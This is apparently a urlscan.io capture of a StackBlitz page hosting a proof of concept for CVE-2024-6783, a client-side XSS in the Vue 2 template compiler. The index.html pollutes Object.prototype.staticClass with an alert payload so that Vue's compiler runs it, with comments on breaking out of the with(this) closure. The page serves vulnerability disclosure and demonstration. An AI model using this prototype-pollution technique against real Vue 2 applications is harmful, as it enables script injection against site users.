urlscan.io logo urlscan.io
SecurityTrails logo

stackblitz.com Open in urlscan Pro
2600:9000:211e:f400:2:496a:a40:93a1  Public Scan

Back to summary
Submitted URL: https://d2v8y104.na1.hubspotlinks.com/Ctc/5F+113/d2v8y104/VVsxy37ZJNVlN25RkVfvtfd1W6G5rDL5hTmKnN80643d3lcq-W7lCdLW6lZ3nyW4SsSMY904ptwF...
Effective URL: https://stackblitz.com/edit/cve-2024-6783?file=index.html&utm_medium=email&_hsenc=p2ANqtz-_M0ckZDeiVh85SPRTV092n3HekFuG...
Submission: On July 24 via manual from IN — Scanned from DE

Form analysis 1 forms found in the DOM

<form class="UrlBar-form-W6UnZ UrlBar-root_disabled-A4NYG"><button type="button" aria-label="Reload preview" class="UrlBar-controlButton-NdU7H" disabled=""><svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="currentColor"
      viewBox="0 0 16 16">
      <path fill-rule="evenodd" d="M4.681 3H2V2h3.5l.5.5V6H5V4a5 5 0 1 0 4.53-.761l.302-.954A6 6 0 1 1 4.681 3" clip-rule="evenodd"></path>
    </svg></button>
  <div class="UrlBar-holster-BTMTt"><label class="UrlBar-inputWrapper-oCC8p"><input hidden="" type="text" aria-label="Preview URL" class="UrlBar-textInput-LPNyK" spellcheck="false" autocomplete="off" autocapitalize="off" autocorrect="off" value="">
      <div class="UrlBar-inputRender-qTsgP"><span></span></div>
    </label></div>
</form>

Text Content

StackBlitz
Fork
Share
CVE-2024-6783 - Vue 2 Template Compiler Client-side XSS
Non-commercial
Sign inGet started

Project
Search
Ports in use
Settings
Switch to Light Theme
Enter Zen Mode


PROJECT

Download Project

INFO

JessicaSachs


CVE-2024-6783 - VUE 2 TEMPLATE COMPILER CLIENT-SIDE XSS

Proof of Concept for CVE-2024-6783 by HeroDevs

317 views7 forks

FILES

_gitignore
Rename
Delete
index.html
Rename
Delete
package-lock.json
Rename
Delete
package.json
Rename
Delete
tsconfig.json
Rename
Delete
vite.config.ts
Rename
Delete
NEWViteConfJoin us October 3rd-4th

Introducing TutorialKit: Drive Your Library Adoption with an Interactive
TutorialJoin us for the first look at TutorialKit, a first-of-its kind framework
for building interactive coding experiences

Save Your Spot

Something broken? File a bug!

index.html
Format Document
Split Editor
More Actions…
Close all
Close saved
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<!DOCTYPE html>
<html>
  <head>
    <script>
      // Not necessary, but helpful in demonstrating breaking out into `window.alert`
      // You can also get out of the `with (this)` closure by adding closing curly braces
      window.Proxy = undefined;
      Object.prototype.staticClass = `alert("Polluted")`;
    </script>
    <script src="https://cdn.jsdelivr.net/npm/vue@2.7.16/dist/vue.js"></script>
    <!--
      Also available for exploiting on 2.0.0
      <script src="https://cdn.jsdelivr.net/npm/vue@2.0.0/dist/vue.js"></script>
    -->
  </head>

  <body>
    <div id="app"></div>
    <script>
      new window.Vue({
        template: `<div class="">Content</div>`,
      }).$mount('#app');
    </script>
  </body>
</html>









Enter to Rename, Shift+Enter to Preview


Terminal

||||||||||||||||||||||||||||||||
# This is a non-commercial version of StackBlitz.
# If you’re using this for business purposes, please purchase a license here.

~/projects/cve-2024-6783
❯ npm install && npm run dev
npm WARN deprecated vue@2.7.16: Vue 2 has reached EOL and is no longer actively
maintained. See htt
ps://v2.vuejs.org/eol/ for more details.
[############......] | reify:finalize: timing reify:unpack Completed in 27ms

















Terminal_1

TERMINAL_1



Close Preview

Installing dependencies

 1. Booting WebContainer
 2. Installing dependencies
 3. Running start command





Add to

 * Popular
 * Frontend
 * Backend
 * Fullstack
 * Docs, Blogs & Slides
 * Creative
 * Mobile & VR
 * Vanilla
 * Native Languages

Astro Basics
Node.js
Next.js
Node.js
Nuxt
Node.js
React
TypeScript
Vanilla
JavaScript
Vanilla
TypeScript
Static
HTML/JS/CSS
Node.js
Blank project
Angular
TypeScript
Vue
JavaScript
WebContainer API
Node.js




PUBLISH A PACKAGE

Are you trying to publish ?

CancelConfirm



ALLOW ACCESS TO LOCALHOST RESOURCE

Request to:
More information

Method: undefined
Headers:

Warning
Allowing access to your localhost resources can lead to security issues such as
unwanted request access or data leaks through your localhost.
Do not ask me again
BlockAllow



OUT OF MEMORY ERROR

This browser tab is running out of memory. Free up memory by closing other
StackBlitz tabs and then refresh the page.

OKLearn more